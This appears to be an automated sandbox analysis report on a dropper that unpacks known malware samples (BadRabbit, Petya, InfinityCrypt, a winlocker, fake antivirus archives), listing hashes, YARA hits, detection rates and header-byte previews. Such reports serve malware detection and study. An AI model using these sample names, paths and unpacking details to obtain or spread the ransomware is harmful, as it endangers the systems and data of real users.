                                                                                                                                                SHA-512:74ECA8C01DE215B33D5CEEA1FDA3F3BEF96B513F58A750DBA04B0DE36F7EF4F7846A6431D52879CA0D8641BFD504D4721A9A96FA2E18C6888FD67FA77686AF87
                                                                                                                                                Malicious:true
                                                                                                                                                Yara Hits:
                                                                                                                                                • Rule: BadRabbit_Gen, Description: Detects BadRabbit Ransomware, Source: C:\Users\user\AppData\Local\Temp\vizhwbnh.yaz\Endermanch@BadRabbit.exe, Author: Florian Roth
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 93%
                                                                                                                                                • Antivirus: Metadefender, Detection: 83%, Browse
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&\..G2.G2.G2.?..G2.?..G2.....G2.....G2.?..G2.G3.G2...G2...G2.Rich.G2.........................PE..L......Y.................0...................@....@.......................... ............@..................................m..d........p...............4...........................................................@..t............................text............0.................. ..`.rdata..*0...@...2...4..............@..@.data...<............f..............@....rsrc....p.......r...h..............@..@.reloc..N...........................@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):230912
                                                                                                                                                Entropy (8bit):6.8803725877131
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:DCyjXhd1mialK+qoNr8PxtZE6x5v+k6f:rjXhd8ZlKOrMZE6x5b6f
                                                                                                                                                MD5:AF2379CC4D607A45AC44D62135FB7015
                                                                                                                                                SHA1:39B6D40906C7F7F080E6BEFA93324DDDADCBD9FA
                                                                                                                                                SHA-256:26B4699A7B9EEB16E76305D843D4AB05E94D43F3201436927E13B3EBAFA90739
                                                                                                                                                SHA-512:69899C47D0B15F92980F79517384E83373242E045CA696C6E8F930FF6454219BF609E0D84C2F91D25DFD5EF3C28C9E099C4A3A918206E957BE806A1C2E0D3E99
                                                                                                                                                Malicious:true
                                                                                                                                                Yara Hits:
                                                                                                                                                • Rule: Petya_Ransomware, Description: Detects Petya Ransomware, Source: C:\Users\user\AppData\Local\Temp\yngyag0a.2kg\Endermanch@Petya.A.exe, Author: Florian Roth
                                                                                                                                                • Rule: Ransom_Petya, Description: Regla para detectar Ransom.Petya con md5 AF2379CC4D607A45AC44D62135FB7015, Source: C:\Users\user\AppData\Local\Temp\yngyag0a.2kg\Endermanch@Petya.A.exe, Author: CCN-CERT
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 100%
                                                                                                                                                • Antivirus: Metadefender, Detection: 84%, Browse
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........\..}\..}\..}Q..}...}Q.!}B..}Q..}...}...}^..}..0}X..}..5}}..}\..}...}y..}9..}Q.%}]..}y. }]..}Rich\..}................PE..L......V.................p...B......oq............@.................................E\.......................................*...................................#......8...............................@............................................text...5o.......p.................. ..`.rdata...............t..............@..@.data...@I...P.......6..............@....rsrc................P..............@..@.reloc...#.......$...b..............@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):54569
                                                                                                                                                Entropy (8bit):6.640114556707396
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:768:4yKoNLsn4Jp9ZvRInygrpMoZN+WtOl08jxBEHCDwBLpZTPCUvQK:j/sn4/OycxZN+MKxp8t9zQK
                                                                                                                                                MD5:87CCD6F4EC0E6B706D65550F90B0E3C7
                                                                                                                                                SHA1:213E6624BFF6064C016B9CDC15D5365823C01F5F
                                                                                                                                                SHA-256:E79F164CCC75A5D5C032B4C5A96D6AD7604FAFFB28AFE77BC29B9173FA3543E4
                                                                                                                                                SHA-512:A72403D462E2E2E181DBDABFCC02889F001387943571391BEFED491AAECBA830B0869BDD4D82BCA137BD4061BBBFB692871B1B4622C4A7D9F16792C60999C990
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 96%
                                                                                                                                                • Antivirus: Metadefender, Detection: 86%, Browse
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g.{.#q..#q..#q..@S?.!q...n...q...UU."q...UP."q..Rich#q..........................PE..L...X\q@.................L...........7.......`....@..................................:......................................db..........pG...........................................................................`..d............................text...(K.......L.................. ..`.rdata..|....`.......P..............@..@.data....3...p.......`..............@....rsrc...pG.......H...n..............@...................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2511528
                                                                                                                                                Entropy (8bit):7.210453995706242
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:49152:6kAG2QGTC5xvMdgpdb1KRHGepUu2cGbqPs9+q2HRPTnFVSLE:6kAjQGTCnvMmpYQqPNRPTnF4Y
                                                                                                                                                MD5:DBFBF254CFB84D991AC3860105D66FC6
                                                                                                                                                SHA1:893110D8C8451565CAA591DDFCCF92869F96C242
                                                                                                                                                SHA-256:68B0E1932F3B4439865BE848C2D592D5174DBDBAAB8F66104A0E5B28C928EE0C
                                                                                                                                                SHA-512:5E9CCDF52EBDB548C3FA22F22DD584E9A603CA1163A622DB5707DBCC5D01E4835879DCFD28CB1589CBB25AED00F352F7A0A0962B1F38B68FC7D6693375E7666D
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 45%
                                                                                                                                                • Antivirus: Metadefender, Detection: 31%, Browse
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........y..v*..v*..v*...*..v*...*..v*...*I.v*...*.v*...*..v*..w*/.v*...*..v*...*..v*...*..v*Rich..v*........PE..L.....V............................Lh............@..................................v....@..................................s..,....@.......................`......@...............................Xm..@...............@....e.......................text............................... ..`.rdata..z...........................@..@.data............0..................@....rsrc........@......................@..@.reloc..2....`......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):576
                                                                                                                                                Entropy (8bit):7.607291838650251
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12:9sXkQr28ny0M/JgGkvX7dXY0eI6YEttD19bmGFwl5fwSS83AKR6vnd/g:A5bny0MWvXO0QVB9CGFwwHLKROn9g
                                                                                                                                                MD5:15BF4E3594FD9B32772DF692B9A95420
                                                                                                                                                SHA1:1A296EB2C7BABA012F7B61151251CD23C2A64ADE
                                                                                                                                                SHA-256:CEE069F3DD00A4BFAB724B84F9C039F1F9DFD9B0EE42AE2D4C9C2FEDF3BDEF24
                                                                                                                                                SHA-512:B648B9B351E088A7927B8D2D4D4DBCEA9C757957E32C708F0A4242E3AB8AADB4D437DDDB4FEFBE2A4DAFC77CD0ECEF5DF2831FAC69F67C59DD4CDB86E27441D2
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:1;;'.4H..........(........8...#...2C|.^U.@u....I.pG^.....T.n..]|L.3...:l.WB9!.Y.*.....i.q..y............5_..p.X...r.u..=.5..j....W...vm.A.tC...y......J...W.V).3 ?1....<...w..i.]........,..S........Ne..*+u..i..!4.P...F....p9<.^CJ.s....R0..lc.c...G%g.?@.O>..h....K.....WKV'n...(...Ndp.;...eT.....GBp.O.f....(..."e...F.....2oP.<_;&..._l.^.......q....,.0v..u...$P..`.Z.Zi..vBv.!$...4W+/Y...H...\A0..R......h...W./S....%N..*..4_]...x.{~.`.......y.'<_>.........>.v.TW..D.6l...,~Y|.}...j....E...+..I.[.vm{.g.Vj....-.5Z..... .....cp$...A.5.hG/.R....r./..#.
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):464
                                                                                                                                                Entropy (8bit):7.6011994050345155
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12:9sXkQr28ny0M/LmpYwCoVHz4tIXadUabaN9E7:A5bny0MzAYmhz47UcajY
                                                                                                                                                MD5:B84F0A9DD33B0240D970DC8A06A1A8DF
                                                                                                                                                SHA1:4F91C1E557E1727777BB10F1FF4C6477383B351C
                                                                                                                                                SHA-256:1B8C57182580FB7AC18C8919E0CBAF9C4A3903AAC18182C71D4438A488D824C3
                                                                                                                                                SHA-512:12432D19A6B80412472328725FAE60BA47BD119C72DE4FD10FB04F146CB91C1BBCAE536D2E1CB37B721529E03D95076D7E713FBA6F78F892804D9F4019FEE86E
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:1;;'.4H..........(........8...#...2C|.^U.@u....I.pG^.....T.n..]|L.3...:l.WB9!.Y.*.....i.q..y............5_..p.X...r.u..=.5..j....W...vm.A.tC...y......J...,.jL...N..T/....k.l.}0*.Q.........x^.L....B....d..7...bf0.......CW...#.'#..."?F;.(.)...<.G.e2[BT.....G.o.?.......A#s...?..5.s~S.f.I..B.w1.j.g.0j.g.)d.......u7!.....i..+1PO...M.....(.WQ.....yy.k.#.B.s........$.}:t..F.UA.H ....3B.;|.....&.....cj..e0v4A:....m.40IJ..y.F.S...W..>;4..y.N%a
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):176
                                                                                                                                                Entropy (8bit):6.983440496416754
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:HddtgDH6jDuK/mvt7nT3z/XP12pNsArU3I8nvVXQyowip0nYmtJ2ps3ljO9g5v:9Yb6jDuK/On7zP9wA48n9Q7wMenasVyC
                                                                                                                                                MD5:7919A8EC74A9A940DCC7BCC847524F46
                                                                                                                                                SHA1:150D4C3DD65F7892EA35F322D29E1F750D6BEEB5
                                                                                                                                                SHA-256:FDDDBA13D09F70C7554605F42EAEBA7493CDDE9D93CC79ECAD427F87DFBC7875
                                                                                                                                                SHA-512:AEEAAC021D75827DF6B953BE9C8F3A83ACD46F47958723A1A8AD3E756AEF3EA303C8E5D7DF234B77B693E676DB558BA1E66D64BE6C39B3ABD5D61014E74A08CA
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:1;;'.4H..........(........8...#...2C|.^U.@u....I.pG^.....T.n..]|L.3...:l.WB9!.Y.*.....i.q..y............5_..p.X...r.u..=.5..j....W...vm.A.tC...y......J.~F......ddD.-k..
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):800
                                                                                                                                                Entropy (8bit):7.7649126870244425
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12:9sXkQr28ny0M/Ea1sEnXq86tSqJCGKquooAHH/CXk2h6ze+FOJG0pcCQNnGUo0OB:A5bny0MMCOIq5reg9LnLCQNGAs3a2
                                                                                                                                                MD5:B452A79AB02262BF807D2F7AEBCB7AC3
                                                                                                                                                SHA1:68BB884B431B37E12AA870F32C0FA5DFAAA72EA2
                                                                                                                                                SHA-256:830A372D50842EE3E674D37E52C2BDE8F778FA5183CF1414B5F68487AC12CF12
                                                                                                                                                SHA-512:8AD99575EC306291B5C7CCDD07B755C9BE6E3E4DDA24BB84078930FBFD333883322D9DDF84662190BA8DA6481CC8DE0681308F94C8E7A1467F5EE6206975EB17
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:1;;'.4H..........(........8...#...2C|.^U.@u....I.pG^.....T.n..]|L.3...:l.WB9!.Y.*.....i.q..y............5_..p.X...r.u..=.5..j....W...vm.A.tC...y......J..fF...I..W.iu..t.8<.PE.G.`@.~...T..D....y d..mE.....8.......+c.%..Y....k.E.&.....^.%-y..z=\...v..3..v...C........\......f|#.|M.....i.wr[\.).\..{R. ...3./..$.....o|mT..a.b....:k.x.Z...iX.l.....U..r..w}h..%....z..o.{.<[...[...z.i{.?.Zu|..'8?......QU.n......%8..g.]....Q.....v$..!.....V.=...h.....0K.Fbvz\....O...)......`Yt...aT.-. ...V...`....?F5....cL|....b.{..kQ..j...G?..|....r! .Nz......e.u:.e.5...|......`...C~.=MF.....X.J.`....".9...8.............Dd@..*,.A..K.f.{".......T5.~.K......7`.!._.P/....(..O........z..gF...%.P.R.6QX...N.....L..%9S..U...qH.\v..n..l....._....U4..bf.......a..%.U...a..03...e(.?.s.
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\zfaio0hk.qy4\Endermanch@WinlockerVB6Blacksod.exe
                                                                                                                                                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, MSI Installer, Title: Installation Database, Keywords: Installer, MSI, Database, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Dec 11 11:47:44 2009, Number of Pages: 200, Security: 0, Code page: 1252, Revision Number: {CA900EFE-690D-4598-B89E-0D9BD5216C79}, Number of Words: 0, Subject: Error file remover, Author: Windows, Name of Creating Application: Advanced Installer 12.4.2 build 66135, Template: ;1033, Comments: This installer database contains the logic and data required to install Error file remover.
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1034240
                                                                                                                                                Entropy (8bit):6.442854593944908
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:yAgEr3Zw5abtZ3L60uRaCXEYDmbnreAgC:PgxabtZ320uRa+EYDmbreAg
                                                                                                                                                MD5:27BC9540828C59E1CA1997CF04F6C467
                                                                                                                                                SHA1:BFA6D1CE9D4DF8BEBA2BEDF59F86A698DE0215F3
                                                                                                                                                SHA-256:05C18698C3DC3B2709AFD3355AD5B91A60B2121A52E5FCC474E4E47FB8E95E2A
                                                                                                                                                SHA-512:A3AE822116CDDB52D859DE7FFC958541BB47C355A835C5129AADE9CC0E5FBA3FF25387061DEB5B55B5694A535F09FE8669485282EB6E7C818CC7092EB3392848
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:......................>.......................................................U...........................................................................................................................................................................................................................................................................................................................................................................................................................................................)...................................................................(....................................... ...#...!..."...$...F...%...&...'...+...*.......7...,...-......./...0...1...2...3...4...5...6...-...K...9...:...;...<...=...>...?...@...A...B...C...D...E.......G...H...I...J...,...L...M...N...O...P...Q...R...S...T...........W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\zfaio0hk.qy4\Endermanch@WinlockerVB6Blacksod.exe
                                                                                                                                                File Type:RIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, mono 22050 Hz
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):741966
                                                                                                                                                Entropy (8bit):7.030207041227603
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:Avw1QKgDpt4/U3xid1CzNVT+DY3YmTEytodUmvnR:b1Q8/UBiKpZY6jtc
                                                                                                                                                MD5:BAB1293F4CF987216AF8051ACDDAF97F
                                                                                                                                                SHA1:00ABE5CFB050B4276C3DD2426E883CD9E1CDE683
                                                                                                                                                SHA-256:BC26B1B97EEB45995BBD5F854DB19F994CCE1BB9AC9FB625EB207302DCCDF344
                                                                                                                                                SHA-512:3B44371756F069BE4F70113A09761A855D80E96C23C8CD76D0C19A43E93D1A159AF079BA5189B88B5EE2C093099A02B00EA4DC20A498C9C0C2DF7DC95E5DDD49
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:RIFFFR..WAVEfmt ........"V..D.......LIST....INFOISFT....Lavf57.36.100.data.R............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\zfaio0hk.qy4\Endermanch@WinlockerVB6Blacksod.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):24576
                                                                                                                                                Entropy (8bit):3.492561660009355
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:/lxmXVZV52WcuHiPbclq6t2YayIj+WJjR9jutoCPrLDpKVZClILvBUZneUwNQzsw:/TO5TcywKHPfDwvOT3wjSPekd5D2KbZP
                                                                                                                                                MD5:E579C5B3C386262E3DD4150EB2B13898
                                                                                                                                                SHA1:5AB7B37956511EA618BF8552ABC88F8E652827D3
                                                                                                                                                SHA-256:E9573A3041E5A45ED8133576D199EB8D12F8922BBE47D194FEF9AC166A96B9E2
                                                                                                                                                SHA-512:9CF947BAD87A701F0E0AD970681767E64B7588089CD9064C72BF24BA6CA0A922988F95B141B29A68AE0E0097F03A66D9B25B9D52197FF71F6E369CDE0438E0BB
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.................H...........".....Rich..........PE..L....r`W.................0... ...............@....@..........................`.......C.......................................4..(....P......................................................................(... ....................................text....(.......0.................. ..`.data........@.......@..............@....rsrc........P.......P..............@..@l.[J............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\zfaio0hk.qy4\Endermanch@WinlockerVB6Blacksod.exe
                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):129816
                                                                                                                                                Entropy (8bit):6.5491938422970915
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:pJzYRnR1UrYpMxbkpG2/wI/Bf6zWcvEm+6MG:zYPqrKM5kA2jy
                                                                                                                                                MD5:3531CF7755B16D38D5E9E3C43280E7D2
                                                                                                                                                SHA1:19981B17AE35B6E9A0007551E69D3E50AA1AFFFE
                                                                                                                                                SHA-256:76133E832C15AA5CBC49FB3BA09E0B8DD467C307688BE2C9E85E79D3BF62C089
                                                                                                                                                SHA-512:7B053BA2CF92EF2431B98B2A06BD56340DAD94DE36D11E326A80CD61B9ACB378AC644AC407CF970F4EF8333B8D3FB4FF40B18BB41EC5AEE49D79A6A2ADCF28FD
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........w..............n9......n(......n>......n...............n7......n/......D)......n,.....Rich....................PE..L.....V...........!.....d...|......'........................................p............@.........................P.......0...<....0.......................@..........................................@...............D............................text....b.......d.................. ..`.rdata...<.......>...h..............@..@.data...L`..........................@....rsrc........0......................@..@.reloc...%...@...&..................@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\zfaio0hk.qy4\Endermanch@WinlockerVB6Blacksod.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):766542
                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3::
                                                                                                                                                MD5:0E7079D29F5BE29C8406DE6F4FD175F2
                                                                                                                                                SHA1:1BFEB2484B7C35F43D37ABC79DAAD274BE4B27CD
                                                                                                                                                SHA-256:205D938ED0540A568E5F1150CC37A733CB76E7945A17A56CA57715419B9EC87F
                                                                                                                                                SHA-512:868AA6165BEA41B096F2B9AA1C4DEB5134CB5CE4B09999E7DE7323AC1EC8906B3ADA7760EA0382D4D245BD2B42264C36AC5B1DDB2145151CDE673100A92A1F4D
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                File Type:Zip archive data, at least v5.1 to extract, compression method=AES Encrypted
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1178406
                                                                                                                                                Entropy (8bit):7.999833834152535
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:24576:lKTP6/tHWoQQRakFbfVKqycdGiazlXVyQ8MiSIxjlTGPje9V4iuquGGspoLA:lK4WDQRaklfVKJcd7MXVlPiZlTejkV42
                                                                                                                                                MD5:9A38C29FF9E12BA2892381EB51C79934
                                                                                                                                                SHA1:76FCF6BCAAC32F624FA0154A9177E44469B5886A
                                                                                                                                                SHA-256:45B75A116AA3B07F90A7C2D9A83C2CDE524797DF88BB5E20F9DC1E74D8527861
                                                                                                                                                SHA-512:C26D8C252D6F18A2AE4419BBFE27099862A625CBC40D8F104FA20CB361DA112EBE6A17935AC3613C24B58F9C291D2219E55F59E0FA40B81F92FCCF190115E734
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:PK..3...c..\.<....X...Z.......Endermanch@AnViPC2009.exe......AE.........-4x5...B.....]..<..}./a..(.q\.{|0....<.{..._..:.....C:.....<R..\]..x.e.S*.AM.2.....!....T..y..u..2._p.N.....Sr..../1..o.2....&..U.D...z%..I..Rn..r.0.........m.,`.Q.......<..6..EB..v7f.,X..x..)1.-"............{...<..>....%|.C...dID...hR.OD.....w.<@..C...6....U;W$..e.....q..!.,.Y;.>.'K...C..Y.J.Q..h.~..f...3...D..C....1.PG..E..%...#-T.<.B..:X...>.SF..2x.S......z..5....1]....c...h.....]....:.WWL...RWV.;.=..?.....S..Of...'......oa..%........8AQ.y...p...X/x.2g._.V.6.fL.~......:..x...........tB.V~..0.v.....uO3..............$.Z...n.b-..P*:$......U.....U.B...O..}..L....3.n..@.......nz.q'.l...z_....e..l.6....{.....>...|%6..;..}o..p[..X.....}..Z.(..7J......l...kb...rHib......1.*...*..m..,.1.p,..FM]AaE....P.+..*M...`XhK.s87P.2Hc.....*.......PY.m.x:OO......&~#..@...}J..B.uq.\.v.fE.p....(.G\!.. X..0....I...Y..mw.Bg.\.R..K..vV.C..lT.wT...o2...Y"(M..,.}.k...@b.8.(.%..K...YT.34[o|.[.
                                                                                                                                                Process:C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):716432
                                                                                                                                                Entropy (8bit):7.999718752172075
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:12288:pKAT6gPoHT7CzZy7fmzVyaF3zA0mKz8doC3m/LuXCC32H+REYWzTdjhoMlX1Q4QM:2gPoHT7CtEfwyaFDAjKz8Bm/LYC+3uYi
                                                                                                                                                MD5:FF84853A0F564152BD0B98D3FA63E695
                                                                                                                                                SHA1:47D628D279DE8A0D47534F93FA5B046BB7F4C991
                                                                                                                                                SHA-256:3AAA9E8EA7C213575FD3AC4EC004629B4EDE0DE06E243F6AAD3CF2403E65D3F2
                                                                                                                                                SHA-512:9EA41FE0652832E25FE558C6D97E9F9F85CCD8A5F4D00DBCC1525A20A953FBD76EFB64D69CE0FDD53C2747159D68FCB4AC0FA340E0253B5401AEBC7FB3774FEB
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:PK.........P><..(........ ...Endermanch@AntivirusPlatinum.exe#.J...3.....f.........r.......G2[X...4......1|...(.....ZG4..X...I..v......Aa.54.yE....MhG..'..e`......&....TXA\........"{5....UqD.i.H........f......@y".}{.....u.....%.V/t..+.=.A1.A.C.T......O..c..2..+....2C64.....f>a...#.\b.4Z._.)....II0.....{n......6x.[.......#O#.... ....jY..*...S..q1. ..7.....`.......IA....v..K.7.'..TXI....l.....vP#.;x.'z.......geZ.z..J..R.AV....U.8`.Zy...a.i.$L....x...9..w..:..4.c........>.a.P`.A. ...8g.=A.....u..#..V.uz.7.".6.G..kv.....p.<.L0.VZpw......?.:...E.v.Vt.c.6..e.Vw[.+.......].%..RSFN....._.%.$.m.{....n....E,7...S.!.....!...;.nH..MQ..5.............zA.....h....P..M..@..[....C..hYN.pF3O=.Kb.j.V...z.i..>YE.q....V~V.g.....7.._Ucwn=]..8.!..>[&.q.98.....y......x..d.l..... '.k.Z..f......XrpMf.y.p....97./...=5../.#.<.>h@..e............K.6.\...>...~.........q{......6...'.{".U..90.oI..zO........%.-..4.kK...D...3...]S.K(.O......).....a...cutT..<.......f.v..8.
                                                                                                                                                Process:C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):813771
                                                                                                                                                Entropy (8bit):7.999770789356288
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:24576:5AKFQL3t2IUmZwXlgqEKUhHgQeX8k22QO:auQLQ6wmqESzPQO
                                                                                                                                                MD5:AB1187F7C6AC5A5D9C45020C8B7492FE
                                                                                                                                                SHA1:0D765ED785AC662AC13FB9428840911FB0CB3C8F
                                                                                                                                                SHA-256:8203F1DE1FA5AB346580681F6A4C405930D66E391FC8D2DA665AC515FD9C430A
                                                                                                                                                SHA-512:BBC6594001A2802ED654FE730211C75178B0910C2D1E657399DE75A95E9CE28A87B38611E30642BAEAE6E110825599E182D40F8E940156607A40F4BAA8AEDDF2
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:PK.........q.Fn....j..U.......Endermanch@AntivirusPro2017.exe%..........J.....5T...........8..K....C....w.+.&. &3..MT&.D..$`u./e.R.r.....=D0........O..'..r...*..%..zu.....]nT...b8c...5.{....$WeHK|.Ocb....h.6#.qD.*Y.......\.t....?mI..;._..bm...........g....2....R.n.&..{y.......(..N.q.2P.\(.+.O..$a.w`.3...%.\1.A.I....qc......Ci..D?a......].....;\mk.(.F+....[$.p.|G.....<.b\...Y.z+7..^...3l.D[..(...=q..Rt.}........}t..$s.!Z.e...W..!..)....nbv...-.../....?w..G..[..eo.iKP..:..l=9..lk.R..Z.Fy.I..}T 35.....v^..G.{.%$l...~...d]/-..F.t.{0.lD).oH..-r...2.e{t.._X.................nA[.S..D.$.4..p.&.......p..L...:"..M&..H...8.....o....|....79.6R.....B.S/..w......NA3=...c.....T..[..2..I..&.N......?Bj8p.t...>7.*..}O|Y.u.......~..,...RM.wO..].g...>\D...o...K+..o...;b$..\.6.z..o.L..(.jD._.A...\..M....y....p...[v..7.8RPJ..y..RdH..d..%...w.!..P=.J.m,.....<.`;^.:"...dV.f?tC.2H.....q..t...(....M..L....C-..<^.../.ZC..h.4.u..w.+"..~.).0P.&...;2.._.....X.....YB.I._~i.bc,....
                                                                                                                                                Process:C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1410736
                                                                                                                                                Entropy (8bit):7.999854281040059
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:24576:oSL6Ntp05P6ftXeQAPm1sPj54cubcZDUPKrFusldmR8uCbdfxgEgL+xTbQDE5GYJ:oftFtXr85409usl8R8vJgEdCY5n3Rv
                                                                                                                                                MD5:E1AC4770F42BAC0E4A6826314331C6EA
                                                                                                                                                SHA1:66493386AD995819871ACA4C30897B6F29AB358F
                                                                                                                                                SHA-256:EABF7FDD31C5838D66CCBC3CA52B0F6EAF8120F83EED43F372F21E4D31734B73
                                                                                                                                                SHA-512:E691103064075B24B1FC2F5B4D1A1C2701EE7C5074C96A7FAAF284F975DE3D7309E7A3EA9B80FB6A2D8950A3B12ACEB22E3516777508CAC70CBA8BE48527F55C
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
